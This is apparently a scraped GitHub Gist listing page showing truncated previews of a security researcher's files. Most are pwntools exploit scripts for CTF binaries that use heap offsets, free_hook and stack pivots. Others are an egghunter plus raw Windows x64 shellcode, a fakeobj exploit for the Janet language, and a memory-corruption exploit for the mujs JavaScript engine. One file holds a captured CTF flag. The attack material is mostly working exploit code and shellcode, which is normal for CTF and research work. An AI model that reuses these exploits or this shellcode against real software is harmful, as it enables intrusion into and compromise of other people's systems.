YiChenChai
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| def login(info): | |
| proc.sendlineafter('Name: ', 'guest') | |
| proc.sendlineafter('account: ', info) | |
| def new_note(sz, cnt): | |
| proc.sendlineafter('> ', '1') | |
| proc.sendlineafter('note: ', str(sz)) | |
| proc.sendafter('Note: ', cnt) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # context.log_level = 'debug' | |
| def add_pkg(dest): | |
| proc.sendlineafter('too long', '1') | |
| proc.sendlineafter('address:', dest) | |
| def remove_pkg(idx): | |
| proc.sendlineafter('too long', '2') |
YiChenChai
/ shellcode.py
Created
September 24, 2021 12:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| egghunter = "I\xbe\x08\x94\x1c\x80\x01\x00\x00\x00H\xc7\xc1\x00\x11\x00\x00A\xff\x96\xd8\x0c\x00\x00H\x05\x00\x0f\x00\x00H\x8d\xa8\x00\x01\x00\x00H\x89\xc4H\x83\xecPH\xb92\xbb=\x80\x01\x00\x00\x00A\xff\x16I\x89\xc5H\x89\xc1A\xffV0H\x89\xc6H1\xdbH\x01\xdeL\x89\xe9H\x8d\x15\x02\x00\x00\x00\xeb\rVirtualQuery\x00A\xff\x96\x88\x01\x00\x00H\x89\xf1H\x89\xeaI\xc7\xc0\x00\x01\x00\x00\xff\xd0\x8b]\x18H\x8bu\x00\x8bE \xa9\x00 \x01\x00u\xbd\x8bE(\xa9\x00\x00\x02\x00t\xb3\x8bE$\xa9\x01\x00\x00\x00u\xa9L\x8d\x0c\x1eH\x8b\x06H=\xef\xbe7\x13t\x0bH\x83\xc6\x08L9\xceu\xec\xeb\x8fI\x89\xf1H\x83\xc6\x08H\x89\xf1H\xc7\xc2\x00P\x00\x00I\xc7\xc0@\x00\x00\x00H\x8d\x1d'\xff\xff\xff\xffS\xf8\xff\xe6" | |
| buf = "" | |
| buf += "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41" | |
| buf += "\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48" | |
| buf += "\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f" | |
| buf += "\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c" | |
| buf += "\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52" | |
| buf += "\x41\x51\x |
YiChenChai
/ rename.py
Created
September 16, 2021 17:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import idaapi | |
| import idautils | |
| import idc | |
| import ida_hexrays | |
| def mod_sig(ea): | |
| tinfo = idaapi.tinfo_t() | |
| ida_typeinf.guess_tinfo(tinfo, ea) | |
| funcdet = idaapi.func_type_data_t() | |
| tinfo.get_func_details(funcdet) |
YiChenChai
/ testssh.py
Created
September 4, 2021 19:12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from vulnmod import * | |
| import paramiko | |
| import logging | |
| logging.basicConfig() | |
| logging.getLogger("paramiko").setLevel(logging.DEBUG) # for example | |
| ssh_client = VulnSSHClient() | |
| ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | |
| ssh_client.connect(hostname='x.x.x.x',username='xxx',password='xxx') |
YiChenChai
/ exploit.janet
Created
March 30, 2021 08:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (defn fakeobj [a b] | |
| (def buffer (tarray/buffer 8)) | |
| (def buffer-float64-view (tarray/new :float64 1 1 0 buffer)) | |
| (def buffer-uint32-view (tarray/new :uint32 2 1 0 buffer)) | |
| (set (buffer-uint32-view 1) a) | |
| (set (buffer-uint32-view 0) b) | |
| (buffer-float64-view 0) | |
| ) | |
| (defn funcarg [a] (a)) |
YiChenChai
/ mujs-exploit.js
Created
July 22, 2020 17:09
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| String.prototype.repeat=function(count){var str=''+this;count=+count;count=Math.floor(count);var maxCount=str.length*count;count=Math.floor(Math.log(count)/Math.log(2));while(count){str+=str;count--;} | |
| str+=str.substring(0,maxCount-str.length);return str;} | |
| zzzaa = []; | |
| zzzcb1 = new DataView(141); | |
| zzzcb2 = new Number(1337); | |
| zzzcc1 = []; zzzcc2 = []; zzzcc3 = []; zzzcc4 = []; zzzcc5 = []; zzzcc6 = []; | |
| var zzzbb1 = "A".repeat(65534); | |
| var zzzbb2 = "\x11".repeat(64); //64 | |
| // 65535 + seplen _+ str1len |
YiChenChai
/ onetimepad.py
Created
January 6, 2020 03:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| proc = process('/tmp/pwn/onetimepad_debug', env={'LD_PRELOAD':'/tmp/out/lib/x86_64-linux-gnu/libc.so.6'}) | |
| # proc = remote('88.198.154.140', 31336) | |
| def write(c): | |
| proc.sendlineafter('> ', 'w') | |
| proc.sendline(c) | |
| def read(idx): | |
| proc.sendlineafter('> ', 'r') | |
| proc.sendline(str(idx)) | |
| return proc.recvuntil('\n')[:-1] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # context.log_level = 'debug' | |
| proc = process('./wumb0list') | |
| OFFSET = 0x809c0 | |
| FREE_HOOK = 0x3ed8e8 | |
| PIVOT = 0x40568 | |
| proc.sendlineafter('FAM', '2') | |
| proc.sendlineafter('Back', '1') | |
| proc.sendlineafter('Choose wisely: ', p64(0x603020) + p64(0x6030d8)) | |
| proc.sendlineafter('Back', '4') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from slip import slip | |
| # flag: flag{IoT_operating_system_down_wooo} | |
| serv = server(60001) | |
| proc = serv.next_connection() | |
| sobj = slip() | |
| e = sobj.encode | |
| proc.send(e('!M' + '\x00' * 8)) | |
| first_frag = '\x01' * 2 # Useless header | |
| sz = 0x100 |
NewerOlder